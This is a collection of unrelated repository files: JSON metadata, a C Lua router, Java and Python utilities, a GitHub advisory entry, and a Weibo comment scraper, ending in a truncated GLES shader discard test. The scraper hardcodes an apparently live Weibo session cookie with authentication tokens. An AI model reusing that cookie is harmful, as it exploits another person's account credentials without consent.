accurately.", "duration": 1500, "language": "eng", "recorded": "2017-10-06", "related_urls": [ "https://2017.pygotham.org/talks/psychology-of-estimation-faster-is-not-always-better/" ], "speakers": [ "<NAME>" ], "tags": [], "thumbnail_url": "https://i.ytimg.com/vi/SppL54fVNe0/maxresdefault.jpg", "title": "Psychology of Estimation: Faster is not always better", "videos": [ { "type": "youtube", "url": "https://www.youtube.com/watch?v=SppL54fVNe0" } ] }
471
377
<reponame>MC-JY/inception /* * Licensed to the Technische Universität Darmstadt under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The Technische Universität Darmstadt * licenses this file to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package de.tudarmstadt.ukp.inception.recommendation.imls.stringmatch.span.trie; public interface KeySanitizer { public static final char SKIP_CHAR = 0; char map(char aChar); default CharSequence sanitize(CharSequence aKey) { StringBuilder sb = new StringBuilder(); for (int i = 0; i < aKey.length(); i++) { char c = map(aKey.charAt(i)); if (c != 0) { sb.append(c); } } return sb; } }
446
392
#include "config.h" #include "main.h" #include "network.h" #include "lua-ext.h" #include <regex.h> #include "cached-access.h" int lua_routed = 0; static char temp_buf[8192]; static char *v_p[100] = {0}; static int v_p_len[100] = {0}; static char *v_c[100] = {0}; static int v_p_count = 0; static char *v_p2[100] = {0}; static int v_p_len2[100] = {0}; static int v_p_count2 = 0; static int match_max = 0; static int match_max_len = 0; static int the_match_pat = 0; #define REGEX_CACHE_SIZE 102400 static regex_t *regex_cache[REGEX_CACHE_SIZE] = {0}; static uint32_t regex_cache_key[REGEX_CACHE_SIZE] = {0}; static int is_match(const char *rule, const char *uri) { static regex_t *re = NULL; static regmatch_t pm[100]; int m = strlen(rule); char *nr = ((m * 2 + 10 < 8192) ? (char *)temp_buf : malloc(m * 2 + 10)); int i = 0, gk = 0, nr_len = 0, fck = 0; v_p_count2 = 1; if(rule[0] != '^') { nr[0] = '^'; nr_len++; } for(i = 0; i < m; i++) { if(rule[i] == ':') { gk = 1; v_p2[v_p_count2] = (char *)rule + (i + 1); if(fck == 0) { fck = nr_len - 1; } } else { if((rule[i] == '(' || rule[i] == '[' || rule[i] == '$' || rule[i] == '/')) { if(fck == 0 && rule[i] != '/') { fck = nr_len - 1; } if(gk == 1) { gk = 0; v_p_len2[v_p_count2] = (rule + i) - v_p2[v_p_count2]; if(rule[i] == '/') { nr[nr_len++] = '('; nr[nr_len++] = '.'; nr[nr_len++] = '+'; nr[nr_len++] = ')'; v_p_count2 ++; } } else { v_p2[v_p_count2] = NULL; } } } if(gk == 0) { nr[nr_len++] = rule[i]; } if(rule[i] == '(') { v_p_count2 ++; } } if(gk == 1) { v_p_len2[v_p_count2] = (rule + i) - v_p2[v_p_count2]; nr[nr_len++] = '('; nr[nr_len++] = '.'; nr[nr_len++] = '+'; nr[nr_len++] = ')'; v_p_count2 ++; } nr[nr_len] = '\0'; if((fck > 1 && strncmp(uri, nr + 1, fck) != 0)) { return 0; } uint32_t key = fnv1a_32(nr, nr_len); int _key = key % REGEX_CACHE_SIZE; re = regex_cache[_key]; if(re && regex_cache_key[_key] != key) { re = NULL; regfree(regex_cache[_key]); free(regex_cache[_key]); regex_cache[_key] = NULL; } if(!re) { re = 
malloc(sizeof(regex_t)); if(!re || regcomp(re, nr, REG_EXTENDED | REG_ICASE) != 0) { LOGF(ERR, "Router Failed to compile regex '%s'", rule); if(re) { regfree(re); } if(nr != (char *)temp_buf) { free(nr); } return 0; } regex_cache[_key] = re; regex_cache_key[_key] = key; } unsigned int g = 0; int reti = regexec(re, uri, 100, pm, 0); if(reti == 0) { for(g = 0; g < 100; g++) { if(pm[g].rm_so == (size_t) - 1) { break; // No more groups } } if(g > match_max || (g >= match_max && nr_len > match_max_len)) { for(v_p_count = 0; v_p_count < v_p_count2; v_p_count++) { free(v_c[v_p_count]); v_c[v_p_count] = NULL; v_p[v_p_count] = v_p2[v_p_count]; v_p_len[v_p_count] = v_p_len2[v_p_count]; } match_max = g; match_max_len = nr_len; for(g = 1; g < match_max; g++) { if(v_p[g]) { free(v_c[g]); v_c[g] = malloc(pm[g].rm_eo - pm[g].rm_so + 1); memcpy(v_c[g], uri + pm[g].rm_so, pm[g].rm_eo - pm[g].rm_so); if(v_c[g][pm[g].rm_eo - pm[g].rm_so - 1] == '/') { pm[g].rm_eo --; } v_c[g][pm[g].rm_eo - pm[g].rm_so] = '\0'; } else { v_c[g] = NULL; } } } else { g = 0; } }/*else { char msgbuf[100]; regerror(reti, &re, msgbuf, sizeof(msgbuf)); fprintf(stderr, "Regex match failed: %s\n", msgbuf); }*/ if(nr != (char *)temp_buf) { free(nr); } return g; } int lua_f_router(lua_State *L) { if(lua_routed) { lua_pushnil(L); lua_pushnil(L); return 2; } lua_routed = 1; if(!lua_isstring(L, 1)) { lua_pushnil(L); lua_pushstring(L, "excepted uri"); return 2; } if(!lua_istable(L, 2)) { lua_pushnil(L); lua_pushstring(L, "excepted router table"); return 2; } const char *uri = lua_tostring(L, 1); int uri_len = strlen(uri); if(uri_len < 1 || uri[0] != '/') { lua_pushnil(L); lua_pushnil(L); lua_pushstring(L, "not a uri"); return 3; } if(lua_isstring(L, 3)) { // try local lua script file epdata_t *epd = NULL; lua_getglobal(L, "__epd__"); if(lua_isuserdata(L, -1)) { epd = lua_touserdata(L, -1); } lua_pop(L, 1); if(epd) { size_t len = 0; const char *fname = lua_tolstring(L, 3, &len); char *full_fname = (char *)&temp_buf; 
memcpy(full_fname, epd->vhost_root, epd->vhost_root_len); memcpy(full_fname + epd->vhost_root_len, fname, len); memcpy(full_fname + epd->vhost_root_len + len , uri, uri_len); len = epd->vhost_root_len + len + uri_len; full_fname[len] = '\0'; if(full_fname[len - 4] == '.' && full_fname[len - 3] == 'l' && full_fname[len - 1] == 'a') { if(cached_access(fnv1a_32(full_fname, len), full_fname) != -1) { lua_pushnil(L); lua_pushstring(L, full_fname + (len - uri_len)); return 2; } } if(full_fname[len - 1] != '/') { memcpy(full_fname + len, ".lua", 4); full_fname[len + 4] = '\0'; //if(access(full_fname, F_OK) != -1) { if(cached_access(fnv1a_32(full_fname, len + 4), full_fname) != -1) { lua_pushnil(L); lua_pushstring(L, full_fname + (len - uri_len)); return 2; } } else { memcpy(full_fname + len, "index.lua", 9); full_fname[len + 9] = '\0'; //if(access(full_fname, F_OK) != -1) { if(cached_access(fnv1a_32(full_fname, len + 9), full_fname) != -1) { lua_pushnil(L); lua_pushstring(L, full_fname + (len - uri_len)); return 2; } memcpy(full_fname + len - 1, ".lua", 4); full_fname[len - 1 + 4] = '\0'; //if(access(full_fname, F_OK) != -1) { if(cached_access(fnv1a_32(full_fname, len + 3), full_fname) != -1) { lua_pushnil(L); lua_pushstring(L, full_fname + (len - uri_len)); return 2; } } } } int pat = 0; lua_pushvalue(L, 2); lua_pushnil(L); match_max = 0; while(lua_next(L, -2)) { if(lua_isstring(L, -2)) { if(is_match(lua_tostring(L, -2), uri)) { the_match_pat = pat; } } lua_pop(L, 1); pat++; if(pat >= 100) { break; } } lua_pop(L, 1); pat = 0; lua_pushvalue(L, 2); lua_pushnil(L); while(lua_next(L, -2)) { if(lua_isstring(L, -2)) { if(match_max > 0 && pat == the_match_pat) { lua_pushvalue(L, -1); lua_remove(L, -2); lua_remove(L, -2); lua_remove(L, -2); lua_createtable(L, 0, match_max); int i = 0; for(i = 1; i < match_max; i++) { if(!v_p[i]) { continue; } lua_pushlstring(L, v_p[i], v_p_len[i]); lua_pushstring(L, v_c[i]); free(v_c[i]); v_c[i] = NULL; lua_settable(L, -3); } return 2; } } 
lua_pop(L, 1); pat++; if(pat >= 100) { break; } } lua_pop(L, 1); return 0; }
5,637
2,362
<reponame>lksnmnn/useWorker<gh_stars>1000+ { "unversionedId": "api-useworker", "id": "api-useworker", "isDocsHomePage": false, "title": "useWorker()", "description": "Import", "source": "@site/docs/useworker.md", "slug": "/api-useworker", "permalink": "/docs/api-useworker", "editUrl": "https://github.com/alewin/useworker/edit/master/website/docs/useworker.md", "version": "current", "sidebar": "someSidebar", "previous": { "title": "Usage", "permalink": "/docs/usage" }, "next": { "title": "WORKER_STATUS", "permalink": "/docs/api-workerstatus" } }
246
346
{ "packagingVersion": "3.0", "name": "redis", "version": "3.2.9-0.0.1", "maintainer": "<EMAIL>", "description": "This is a single redis container, which is suited for HA setups. Redis is a popular in-memory data structure store, used as database, cache and message broker.. See documentation for more details: https://github.com/dcos/examples/tree/master/redis ", "website": "http://www.redis.io", "framework": false, "tags": ["mesosphere", "service", "redis", "storage"], "licenses": [ { "name": "BSD", "url": "http://redis.io/topics/license" } ], "website": "http://redis.io", "postInstallNotes": "Redis installed!", "preInstallNotes": "This DC/OS Service is currently in preview. There may be bugs, incomplete features, incorrect documentation, or other discrepancies. Redis requires a single node with 300MB of RAM and 0.1 CPUs. ", "postUninstallNotes": "Thank you for using Redis", "lastUpdated": 1496284523 }
304
6,263
import itertools import pytest import os from pipenv import environments from pipenv.utils import temp_environ @pytest.mark.environments @pytest.mark.parametrize( "arg, prefix, use_negation", list(itertools.product(("ENABLE_SOMETHING",), ("FAKEPREFIX", None), (True, False))), ) def test_get_from_env(arg, prefix, use_negation): negated_arg = "NO_{0}".format(arg) positive_var = arg negative_var = negated_arg if prefix: negative_var = "{0}_{1}".format(prefix, negative_var) positive_var = "{0}_{1}".format(prefix, positive_var) # set the positive first for var_to_set, opposite_var in ((arg, negated_arg), (negated_arg, arg)): os.environ.pop(var_to_set, None) os.environ.pop(opposite_var, None) with temp_environ(): is_positive = var_to_set == arg is_negative = not is_positive envvar = positive_var if is_positive else negative_var os.environ[envvar] = "true" main_expected_value = True if is_positive else None if use_negation and not is_positive: main_expected_value = False # use negation means if the normal variable isnt set we will check # for the negated version negative_expected_value = ( True if is_negative else None ) if is_positive: assert ( environments.get_from_env( var_to_set, prefix, check_for_negation=use_negation ) is main_expected_value ) assert ( environments.get_from_env( opposite_var, prefix, check_for_negation=use_negation ) is negative_expected_value ) else: # var_to_set = negative version i.e. NO_xxxx # opposite_var = positive_version i.e. XXXX # get NO_BLAH -- expecting this to be True assert ( environments.get_from_env( var_to_set, prefix, check_for_negation=use_negation ) is negative_expected_value ) # get BLAH -- expecting False if checking for negation # but otherwise should be None assert ( environments.get_from_env( opposite_var, prefix, check_for_negation=use_negation ) is main_expected_value )
1,367
892
{ "schema_version": "1.2.0", "id": "GHSA-4f6h-p35h-c9p6", "modified": "2022-05-01T07:41:50Z", "published": "2022-05-01T07:41:50Z", "aliases": [ "CVE-2006-6817" ], "details": "AlstraSoft Web Host Directory allows remote attackers to obtain sensitive information by requesting any invalid URI, which reveals the path in an error message, a different vulnerability than CVE-2006-2617.", "severity": [ ], "affected": [ ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2006-6817" }, { "type": "WEB", "url": "http://www.securityfocus.com/archive/1/455352/100/0/threaded" } ], "database_specific": { "cwe_ids": [ ], "severity": "MODERATE", "github_reviewed": false } }
340
1,062
// // Generated by class-dump 3.5b1 (64 bit) (Debug version compiled Dec 3 2019 19:59:57). // // Copyright (C) 1997-2019 <NAME>. // #import <IMAP/IMAPNetworkTaskOperation.h> @class IMAPDownloadCache, NSArray; @protocol IMAPMessageDataSource, IMAPSyncAttachmentsOperationDelegate; @interface IMAPSyncAttachmentsOperation : IMAPNetworkTaskOperation { NSArray *_downloads; // 8 = 0x8 id <IMAPMessageDataSource> _dataSource; // 16 = 0x10 id <IMAPSyncAttachmentsOperationDelegate> _delegate; // 24 = 0x18 IMAPDownloadCache *_downloadCache; // 32 = 0x20 } @property(retain, nonatomic) IMAPDownloadCache *downloadCache; // @synthesize downloadCache=_downloadCache; @property(readonly, nonatomic) __weak id <IMAPSyncAttachmentsOperationDelegate> delegate; // @synthesize delegate=_delegate; @property(readonly, nonatomic) id <IMAPMessageDataSource> dataSource; // @synthesize dataSource=_dataSource; @property(readonly, copy, nonatomic) NSArray *downloads; // @synthesize downloads=_downloads; - (void).cxx_destruct; // IMP=0x000000000005607a - (void)main; // IMP=0x0000000000055510 - (id)description; // IMP=0x0000000000055476 - (id)initWithMailboxName:(id)arg1; // IMP=0x00000000000553a7 - (id)initWithDownloads:(id)arg1 dataSource:(id)arg2 downloadCache:(id)arg3 delegate:(id)arg4; // IMP=0x0000000000055284 @end
472
313
/* * Copyright 2018 Netflix, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.netflix.titus.common.util.rx; import java.util.ArrayList; import java.util.List; import java.util.concurrent.BlockingQueue; import java.util.concurrent.LinkedBlockingDeque; import java.util.concurrent.atomic.AtomicReference; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import rx.Observable; import rx.Observer; import rx.Scheduler; import rx.functions.Action1; import rx.subjects.AsyncSubject; /** * A computation task invoker with the following properties: * <ul> * <li>Each computation is represented as an {@link Observable} emitting one or more elements, that ultimately completes</li> * <li>Only one computation runs at a time. Only when it completes another one is started.</li> * <li>If a computation is running, and new recompute requests are submitted, they are queued, until the running computation completes</li> * <li>For a backlog of computation requests in the queue, a single computation is performed</li> * </ul> * This invoker is useful if computations mustn't be done in parallel, and its result depends on point in time * (give me result created no later than when the request was submitted). The latter property allows for computation * result sharing across queued requests. 
*/ public class ComputationTaskInvoker<O> { private static final Logger logger = LoggerFactory.getLogger(ComputationTaskInvoker.class); private final Scheduler.Worker worker; private final Observable<O> computation; private final BlockingQueue<Observer<? super O>> waitingObservers = new LinkedBlockingDeque<>(); private final AtomicReference<Observable<Void>> pendingComputation = new AtomicReference<>(); public ComputationTaskInvoker(Observable<O> computation, Scheduler scheduler) { this.worker = scheduler.createWorker(); this.computation = computation; } public Observable<O> recompute() { return Observable.create(subscriber -> { waitingObservers.add(subscriber); worker.schedule(this::drain); }); } private void drain() { if (waitingObservers.isEmpty()) { return; } AsyncSubject<Void> subject = AsyncSubject.create(); Observable<Void> pending = pendingComputation.get(); while (pending == null) { if (pendingComputation.compareAndSet(null, subject)) { pending = subject; } else { pending = pendingComputation.get(); } } if (pending == subject) { List<Observer<? super O>> available = new ArrayList<>(); waitingObservers.drainTo(available); computation .doOnTerminate(() -> { pendingComputation.set(null); subject.onCompleted(); }) .subscribe( next -> doSafely(available, o -> o.onNext(next)), e -> doSafely(available, o -> o.onError(e)), () -> doSafely(available, Observer::onCompleted) ); } else { pending.doOnTerminate(() -> worker.schedule(this::drain)).subscribe(); } } private void doSafely(List<Observer<? super O>> observers, Action1<Observer<? super O>> action) { observers.forEach(o -> { try { action.call(o); } catch (Throwable e) { logger.debug("Observable invocation failure", e); } }); } }
1,593
3,172
<filename>examples/PPO/scaler.py # Third party code # # The following code are copied or modified from: # https://github.com/pat-coady/trpo import numpy as np import scipy.signal __all__ = ['Scaler'] class Scaler(object): """ Generate scale and offset based on running mean and stddev along axis=0 offset = running mean scale = 1 / (stddev + 0.1) / 3 (i.e. 3x stddev = +/- 1.0) """ def __init__(self, obs_dim): """ Args: obs_dim: dimension of axis=1 """ self.vars = np.zeros(obs_dim) self.means = np.zeros(obs_dim) self.cnt = 0 self.first_pass = True def update(self, x): """ Update running mean and variance (this is an exact method) Args: x: NumPy array, shape = (N, obs_dim) see: https://stats.stackexchange.com/questions/43159/how-to-calculate-pooled- variance-of-two-groups-given-known-group-variances-mean """ if self.first_pass: self.means = np.mean(x, axis=0) self.vars = np.var(x, axis=0) self.cnt = x.shape[0] self.first_pass = False else: n = x.shape[0] new_data_var = np.var(x, axis=0) new_data_mean = np.mean(x, axis=0) new_data_mean_sq = np.square(new_data_mean) new_means = ( (self.means * self.cnt) + (new_data_mean * n)) / (self.cnt + n) self.vars = (((self.cnt * (self.vars + np.square(self.means))) + (n * (new_data_var + new_data_mean_sq))) / (self.cnt + n) - np.square(new_means)) self.vars = np.maximum( 0.0, self.vars) # occasionally goes negative, clip self.means = new_means self.cnt += n def get(self): """ returns 2-tuple: (scale, offset) """ return 1 / (np.sqrt(self.vars) + 0.1) / 3, self.means
1,023
710
""" 爬取微博评论,保存到文件中 https://m.weibo.cn/api/comments/show?id=4477013081328252&page=50 该接口能获取微博的前50页数据,每页10条, id 是某条微博的id https://m.weibo.cn/comments/hotflow?mid=4477013081328252&max_id=330569188932643&max_id_type=0 此接口能爬到所有评论信息, mid 是某条微博id, max_id 是上一个请求返回的分页参数, max_id_type 固定为0就好 """ from pymongo import MongoClient import requests import time __author__ = 'liuzhijun' headers = { "Host": "m.weibo.cn", "User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) " "Version/9.0 Mobile/13B143 Safari/601.1", "Cookie": "ALF=1585622740; SCF=AkYKPH_4_43DdgVfDGrD7N6PC2DQN3YlA5MS_Wtn7viiEfWYidSCeZUVClv83hcG0e3LaFPJMMOxfGELIzLciEY.; SUB=_2A25zX1GoDeRhGedI4lUW8CzOzz2IHXVQoH_grDV6PUJbktANLUzEkW1NVmpkfU6FYNoJwj2PzeF0Y9AMgJSdjT2J; SUBP=0033WrSXqPxfM725Ws9jqgMF55529P9D9WWbbPzPaDijADNgfIppECPn5JpX5K-hUgL.Fo2c1KMNehzESh22dJLoIEXLxKMLBKnL12zLxK-LB.2L12qLxK-L1K2L1KnLxK-LB.qL1KMLxK-L1hqL1-zt; SUHB=0Ryr1hd10ceFZR; SSOLoginState=1583030776; _T_WM=68502013108; WEIBOCN_FROM=1110006030; MLOGIN=1; XSRF-TOKEN=<PASSWORD>" } client = MongoClient('mongodb://localhost:27017/') db = client['weibo'] def main(mid, max_id): """ :param mid: 某条微博id :param max_id: 分页参数 :return: """ url = "https://m.weibo.cn/comments/hotflow?max_id_type=0" params = {"mid": mid} if max_id: params['max_id'] = max_id res = requests.get(url, params=params, headers=headers) print(res.content) result = res.json() max_id = result.get("data").get("max_id") data = result.get('data').get('data') for item in data: db['comment'].insert_one(item) if max_id: time.sleep(1) main(mid, max_id) if __name__ == '__main__': main("4477013081328252", None)
1,081
2,151
<filename>third_party/blink/renderer/platform/graphics/canvas_metrics.h // Copyright 2015 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef THIRD_PARTY_BLINK_RENDERER_PLATFORM_GRAPHICS_CANVAS_METRICS_H_ #define THIRD_PARTY_BLINK_RENDERER_PLATFORM_GRAPHICS_CANVAS_METRICS_H_ #include "third_party/blink/renderer/platform/platform_export.h" #include "third_party/blink/renderer/platform/wtf/allocator.h" namespace blink { class PLATFORM_EXPORT CanvasMetrics { STATIC_ONLY(CanvasMetrics); public: enum CanvasContextUsage { kCanvasCreated = 0, kGPUAccelerated2DCanvasImageBufferCreated = 1, kUnaccelerated2DCanvasImageBufferCreated = 3, kAccelerated2DCanvasGPUContextLost = 4, kUnaccelerated2DCanvasImageBufferCreationFailed = 5, kGPUAccelerated2DCanvasImageBufferCreationFailed = 6, kGPUAccelerated2DCanvasDeferralDisabled = 8, kGPUAccelerated2DCanvasSurfaceCreationFailed = 9, kNumberOfUsages }; static void CountCanvasContextUsage(const CanvasContextUsage); }; } // namespace blink #endif // THIRD_PARTY_BLINK_RENDERER_PLATFORM_GRAPHICS_CANVAS_METRICS_H_
460
354
/*------------------------------------------------------------------------- * drawElements Quality Program OpenGL ES 2.0 Module * ------------------------------------------------- * * Copyright 2014 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * *//*! * \file * \brief Shader discard statement tests. *//*--------------------------------------------------------------------*/ #include "es2fShaderDiscardTests.hpp" #include "glsShaderRenderCase.hpp" #include "tcuStringTemplate.hpp" #include "gluTexture.hpp" #include <map> #include <sstream> #include <string> #include "glwEnums.hpp" #include "glwFunctions.hpp" using tcu::StringTemplate; using std::map; using std::string; using std::ostringstream; using namespace glu; using namespace deqp::gls; namespace deqp { namespace gles2 { namespace Functional { enum CaseFlags { FLAG_USES_TEXTURES = (1<<0), FLAG_REQUIRES_DYNAMIC_LOOPS = (1<<1), }; class ShaderDiscardCase : public ShaderRenderCase { public: ShaderDiscardCase (Context& context, const char* name, const char* description, const char* shaderSource, ShaderEvalFunc evalFunc, deUint32 flags); virtual ~ShaderDiscardCase (void); void init (void); void deinit (void); void setupUniforms (int programID, const tcu::Vec4& constCoords); private: const deUint32 m_flags; glu::Texture2D* m_brickTexture; }; ShaderDiscardCase::ShaderDiscardCase (Context& context, const char* name, const char* description, const char* shaderSource, ShaderEvalFunc evalFunc, deUint32 
flags) : ShaderRenderCase (context.getTestContext(), context.getRenderContext(), context.getContextInfo(), name, description, false, evalFunc) , m_flags (flags) , m_brickTexture (DE_NULL) { m_fragShaderSource = shaderSource; m_vertShaderSource = "attribute highp vec4 a_position;\n" "attribute highp vec4 a_coords;\n" "varying mediump vec4 v_color;\n" "varying mediump vec4 v_coords;\n\n" "void main (void)\n" "{\n" " gl_Position = a_position;\n" " v_color = vec4(a_coords.xyz, 1.0);\n" " v_coords = a_coords;\n" "}\n"; } ShaderDiscardCase::~ShaderDiscardCase (void) { delete m_brickTexture; } void ShaderDiscardCase::init (void) { try { gls::ShaderRenderCase::init(); } catch (const CompileFailed&) { if (m_flags & FLAG_REQUIRES_DYNAMIC_LOOPS) { const bool isSupported = m_isVertexCase ? m_ctxInfo.isVertexDynamicLoopSupported() : m_ctxInfo.isFragmentDynamicLoopSupported(); if (!isSupported) throw tcu::NotSupportedError("Dynamic loops not supported"); } throw; } if (m_flags & FLAG_USES_TEXTURES) { m_brickTexture = glu::Texture2D::create(m_renderCtx, m_ctxInfo, m_testCtx.getArchive(), "data/brick.png"); m_textures.push_back(TextureBinding(m_brickTexture, tcu::Sampler(tcu::Sampler::CLAMP_TO_EDGE, tcu::Sampler::CLAMP_TO_EDGE, tcu::Sampler::CLAMP_TO_EDGE, tcu::Sampler::LINEAR, tcu::Sampler::LINEAR))); } } void ShaderDiscardCase::deinit (void) { gls::ShaderRenderCase::deinit(); delete m_brickTexture; m_brickTexture = DE_NULL; } void ShaderDiscardCase::setupUniforms (int programID, const tcu::Vec4&) { const glw::Functions& gl = m_renderCtx.getFunctions(); gl.uniform1i(gl.getUniformLocation(programID, "ut_brick"), 0); } ShaderDiscardTests::ShaderDiscardTests (Context& context) : TestCaseGroup(context, "discard", "Discard statement tests") { } ShaderDiscardTests::~ShaderDiscardTests (void) { } enum DiscardMode { DISCARDMODE_ALWAYS = 0, DISCARDMODE_NEVER, DISCARDMODE_UNIFORM, DISCARDMODE_DYNAMIC, DISCARDMODE_TEXTURE, DISCARDMODE_LAST }; enum DiscardTemplate { 
DISCARDTEMPLATE_MAIN_BASIC = 0, DISCARDTEMPLATE_FUNCTION_BASIC, DISCARDTEMPLATE_MAIN_STATIC_LOOP, DISCARDTEMPLATE_MAIN_DYNAMIC_LOOP, DISCARDTEMPLATE_FUNCTION_STATIC_LOOP, DISCARDTEMPLATE_LAST }; // Evaluation functions inline void evalDiscardAlways (ShaderEvalContext& c) { c.discard(); } inline void evalDiscardNever (ShaderEvalContext& c) { c.color.xyz() = c.coords.swizzle(0,1,2); } inline void evalDiscardDynamic (ShaderEvalContext& c) { c.color.xyz() = c.coords.swizzle(0,1,2); if (c.coords.x()+c.coords.y() > 0.0f) c.discard(); } inline void evalDiscardTexture (ShaderEvalContext& c) { c.color.xyz() = c.coords.swizzle(0,1,2); if (c.texture2D(0, c.coords.swizzle(0,1) * 0.25f + 0.5f).x() < 0.7f) c.discard(); } static ShaderEvalFunc getEvalFunc (DiscardMode mode) { switch (mode) { case DISCARDMODE_ALWAYS: return evalDiscardAlways; case DISCARDMODE_NEVER: return evalDiscardNever; case DISCARDMODE_UNIFORM: return evalDiscardAlways; case DISCARDMODE_DYNAMIC: return evalDiscardDynamic; case DISCARDMODE_TEXTURE: return evalDiscardTexture; default: DE_ASSERT(DE_FALSE); return evalDiscardAlways; } } static const char* getTemplate (DiscardTemplate variant) { switch (variant) { case DISCARDTEMPLATE_MAIN_BASIC: return "varying mediump vec4 v_color;\n" "varying mediump vec4 v_coords;\n" "uniform sampler2D ut_brick;\n" "uniform mediump int ui_one;\n\n" "void main (void)\n" "{\n" " gl_FragColor = v_color;\n" " ${DISCARD};\n" "}\n"; case DISCARDTEMPLATE_FUNCTION_BASIC: return "varying mediump vec4 v_color;\n" "varying mediump vec4 v_coords;\n" "uniform sampler2D ut_brick;\n" "uniform mediump int ui_one;\n\n" "void myfunc (void)\n" "{\n" " ${DISCARD};\n" "}\n\n" "void main (void)\n" "{\n" " gl_FragColor = v_color;\n" " myfunc();\n" "}\n"; case DISCARDTEMPLATE_MAIN_STATIC_LOOP: return "varying mediump vec4 v_color;\n" "varying mediump vec4 v_coords;\n" "uniform sampler2D ut_brick;\n" "uniform mediump int ui_one;\n\n" "void main (void)\n" "{\n" " gl_FragColor = v_color;\n" " for (int i 
= 0; i < 2; i++)\n" " {\n" " if (i > 0)\n" " ${DISCARD};\n" " }\n" "}\n"; case DISCARDTEMPLATE_MAIN_DYNAMIC_LOOP: return "varying mediump vec4 v_color;\n" "varying mediump vec4 v_coords;\n" "uniform sampler2D ut_brick;\n" "uniform mediump int ui_one;\n" "uniform mediump int ui_two;\n\n" "void main (void)\n" "{\n" " gl_FragColor = v_color;\n" " for (int i = 0; i < ui_two; i++)\n" " {\n" " if (i > 0)\n" " ${DISCARD};\n" " }\n" "}\n"; case DISCARDTEMPLATE_FUNCTION_STATIC_LOOP: return "varying mediump vec4 v_color;\n" "varying mediump vec4 v_coords;\n" "uniform sampler2D ut_brick;\n" "uniform mediump int ui_one;\n\n" "void myfunc (void)\n" "{\n" " for (int i = 0; i < 2; i++)\n" " {\n" " if (i > 0)\n" " ${DISCARD};\n" " }\n" "}\n\n" "void main (void)\n" "{\n" " gl_FragColor = v_color;\n" " myfunc();\n" "}\n"; default: DE_ASSERT(DE_FALSE); return DE_NULL; } } static const char* getTemplateName (DiscardTemplate variant) { switch (variant) { case DISCARDTEMPLATE_MAIN_BASIC: return "basic"; case DISCARDTEMPLATE_FUNCTION_BASIC: return "function"; case DISCARDTEMPLATE_MAIN_STATIC_LOOP: return "static_loop"; case DISCARDTEMPLATE_MAIN_DYNAMIC_LOOP: return "dynamic_loop"; case DISCARDTEMPLATE_FUNCTION_STATIC_LOOP: return "function_static_loop"; default: DE_ASSERT(DE_FALSE); return DE_NULL; } } static const char* getModeName (DiscardMode mode) { switch (mode) { case DISCARDMODE_ALWAYS: return "always"; case DISCARDMODE_NEVER: return "never"; case DISCARDMODE_UNIFORM: return "uniform"; case DISCARDMODE_DYNAMIC: return "dynamic"; case DISCARDMODE_TEXTURE: return "texture"; default: DE_ASSERT(DE_FALSE); return DE_NULL; } } static const char* getTemplateDesc (DiscardTemplate variant) { switch (variant) { case DISCARDTEMPLATE_MAIN_BASIC: return "main"; case DISCARDTEMPLATE_FUNCTION_BASIC: return "function"; case DISCARDTEMPLATE_MAIN_STATIC_LOOP: return "static loop"; case DISCARDTEMPLATE_MAIN_DYNAMIC_LOOP: return "dynamic loop"; case DISCARDTEMPLATE_FUNCTION_STATIC_LOOP: return 
"static loop in function"; default: DE_ASSERT(DE_FALSE); return DE_NULL; } } static const char* getModeDesc (DiscardMode mode) { switch (mode) { case DISCARDMODE_ALWAYS: return "Always discard"; case DISCARDMODE_NEVER: return "Never discard"; case DISCARDMODE_UNIFORM: return "Discard based on uniform value"; case DISCARDMODE_DYNAMIC: return "Discard based on varying values"; case DISCARDMODE_TEXTURE: return "Discard based on texture value"; default: DE_ASSERT(DE_FALSE); return DE_NULL; } } ShaderDiscardCase* makeDiscardCase (Context& context, DiscardTemplate tmpl, DiscardMode mode) { StringTemplate shaderTemplate(getTemplate(tmpl)); map<string, string> params; switch (mode) { case DISCARDMODE_ALWAYS: params["DISCARD"] = "discard"; break; case DISCARDMODE_NEVER: params["DISCARD"] = "if (false) discard"; break; case DISCARDMODE_UNIFORM: params["DISCARD"] = "if (ui_one > 0) discard"; break; case DISCARDMODE_DYNAMIC: params["DISCARD"] = "if (v_coords.x+v_coords.y > 0.0) discard"; break; case DISCARDMODE_TEXTURE: params["DISCARD"] = "if (texture2D(ut_brick, v_coords.xy*0.25+0.5).x < 0.7) discard"; break; default: DE_ASSERT(DE_FALSE); break; } string name = string(getTemplateName(tmpl)) + "_" + getModeName(mode); string description = string(getModeDesc(mode)) + " in " + getTemplateDesc(tmpl); deUint32 flags = (mode == DISCARDMODE_TEXTURE ? FLAG_USES_TEXTURES : 0) | (tmpl == DISCARDTEMPLATE_MAIN_DYNAMIC_LOOP ? FLAG_REQUIRES_DYNAMIC_LOOPS : 0); return new ShaderDiscardCase(context, name.c_str(), description.c_str(), shaderTemplate.specialize(params).c_str(), getEvalFunc(mode), flags); } void ShaderDiscardTests::init (void) { for (int tmpl = 0; tmpl < DISCARDTEMPLATE_LAST; tmpl++) for (int mode = 0; mode < 